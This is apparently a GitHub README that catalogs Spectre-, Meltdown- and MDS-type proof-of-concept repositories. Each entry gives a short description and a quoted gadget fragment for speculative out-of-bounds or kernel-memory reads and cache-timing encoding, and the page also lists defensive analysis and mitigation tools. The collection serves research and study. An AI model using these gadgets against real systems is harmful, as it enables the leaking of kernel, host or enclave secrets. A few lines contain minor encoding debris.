Skip to content

Collection of Spectre-type, Meltdown-type and MDS-type PoCs

Notifications You must be signed in to change notification settings


Folders and files

Last commit message
Last commit date

Latest commit



11 Commits

Repository files navigation

Collected from existing repos, this repo lists known Spectre-type, Meltdown-type and MDS-type PoCs. PRs are welcome.

If you want to read corresponding codes, please checkout the branch codes.

git clone -b codes


1. Collection

1.1 speed47/spectre-meltdown-checker

1.2 mniip/spectre-meltdown-poc

1.3 msmania/microarchitectural-attack

  movzx eax, byte [rcx]
  shl rax, 0Ch
  mov al, byte [rax+rdx]

1.4 adamalston/Meltdown-Spectre

2. Spectre-type

2.1 ErikAugust/spectre.c

void victim_function(size_t x)
	if (x < array1_size)
		temp &= array2[array1[x] * 512];

2.2 lsds/spectre-attack-sgx

void ecall_victim_function(size_t x, uint8_t * array2, unsigned int * outside_array1_size) {
	//if (x < array1_size) {
	if (x < *outside_array1_size) {
		 temp &= array2[array1[x] * 512];

2.3 opsxcq/exploit-cve-2017-5715

void accessPage(int page) {
  int value=0;
  if (page < indexArraySize) {
    value = value & attackArray[indexArray[page] * PAGE_SIZE];

2.4 cgvwzq/spectre

function vul_call(index, sIndex)
        index = index |0;
        sIndex = sIndex |0;
        var arr_size = 0;
        var j = 0;
        junk = probeTable[0]|0;
        // "size" value repeated at different offsets to avoid having to flush it?
        j = (((sIndex << 12) | 0) +  sizeArrayStart)|0;
        arr_size = simpleByteArray[j|0]|0;
        if ((index|0) < (arr_size|0))
            index = simpleByteArray[index|0]|0;
            index = (index << 12)|0;
            index = (index & ((TABLE1_BYTES-1)|0))|0;
            junk = (junk ^ (probeTable[index]|0))|0;

2.5 amosbe/spectre-without-shared-memory

2.6 HexHive/SMoTherSpectre

/* smother gadget */
asm("cmp $0, %%r15;"
    "je MARK;" ::: );
CRC324 CRC322
asm("movl $-1, %%r12d; divl %%r12d;" :::);
asm("lfence;" :::);

2.7 mmxsrup/CVE-2018-3639

2.8 Shuiliusheng/CVE-2018-3639-specter-v4-

void victim_function(size_t idx) {
	unsigned char **memory_slot_slow_ptr = *memory_slot_ptr;
	*memory_slot_slow_ptr = public_key;
	tmp = probe[(*memory_slot)[idx] * 4096];

3. Meltdown-type

3.1 IAIK/meltdown

3.2 feruxmax/meltdown

int speculative_transfer(int div, uint8_t secret)
    uint8_t data = 0;
    int res = 0;

    // rise_exception after delay
    int a=div;
    for(int i=0;i<100000;i++)
    data = a / div;

    // speculative
    res += cache[CACHE_LINE_SIZE*secret];

    return res + data;

3.3 Frichetten/meltdown-spectre-poc

asm __volatile__ (
           ".global __speculative_byte_load_exit \n\t"
           "%=:                              \n"
           "xorq %%rax, %%rax                \n"
           "movb (%[ptr]), %%al              \n"
           "shlq $0xc, %%rax                 \n"
           "jz %=b                           \n"
           "movq (%[buf], %%rax, 1), %%rbx   \n"
           "__speculative_byte_load_exit:     \n"
           "nop                               \n"
           :  [ptr] "r" (ptr), [buf] "r" (buf)
           :  "%rax", "%rbx");

3.4 paboldin/meltdown-exploit

; rcx = kernel address
; rbx = probe array
mov al, byte [rcx]
shl rax, 0xc
jz retry
mov rbx, qword [rbx + rax]

3.5 Semihalf/spectre-meltdown

__attribute__((noinline)) uint8_t bounds_check(uint64_t idx)
	if (idx < array_size) /* no reading outside the array, or is it? */
		return side_effects[base_array[idx] * PAGE_SIZE];
	return 0; /* just return 0 if index is out of range */

3.6 gregvish/l1tf-poc.git

  • Link:
  • Tool: C, ASM
  • Description: Its README explains the concerns to run the PoC, dumping host memory in a guest. The PoC should run on a VM which is compromised by specific codes. It is necessary to break the mapping of the VM to physical address, which may use a brute force method. It mentions that L1TF succeeds to capture secrets in L1 DCache. Otherwise, no meaningful data will be inferred.
    push %rbx
    push %rdi
    push %rsi
    push %rdx

    // Do the illegal access (rdx is ptr param)
    movb (%rdx), %bl
    // Duplicate result to rax
    mov %rbx, %rax

    // calculate our_buffer_lsb offset according to low nibble
    and $0xf, %rax
    shl $0xc, %rax

    // calculate our_buffer_msb offset according to high nibble
    shr $0x4, %rbx
    and $0xf, %rbx
    shl $0xc, %rbx

    // rsi is our_buffer_lsb param
    mov (%rsi, %rax, 1), %rax
    // rdi is our_buffer_msb param
    mov (%rdi, %rbx, 1), %rbx

4. MDS-type

4.1 ZombieLoad

  • Link:
  • Tool: C
  • Description: Besides four ZombieLoad attack scenarios, this repo contains a cacheutils file, which implement the basic elements to construct Flush+Reload attacks, such as the choice of threshold and Flush+Reload function. An embedded disassembly gadget supports accessing address through mov directly.
while (1) {
    // Ensure the kernel mapping refers to a value not in the cache

    // Dereference the kernel address and encode in LUT
    // Not in cache -> reads load buffer entry
    if (!setjmp(trycatch_buf)) {
      maccess(mem + 4096 * target[0]);

4.2 RIDL

5. Related

5.1 oo7

  • Link:
  • Tool: JavaScript, Shell
  • Description: Employ control flow extraction, taint analysis and address analysis at the binary level.

5.2 KleesSpectre

  • Link: [][]
  • Tool: LLVM
  • Description: Employ a symbolic execution tool, klee, to find suspicious gadgets. It should be noted that the author of this tool is the same as oo7. Compared to taint analysis, symbolic execution is a more fine grained approach. The memory locations accessed by a read/write is captured as symbolic expressions over (tainted) input, in�stead of simply maintaining that the location accessed by a read/write is tainted.

5.3 SgxPectre

5.4 speculator

5.5 InvisiSpec

5.6 STT

5.7 SpectreGuard

5.8 willyb321/meltdown-spectre-poc-grabber


Collection of Spectre-type, Meltdown-type and MDS-type PoCs







No releases published


No packages published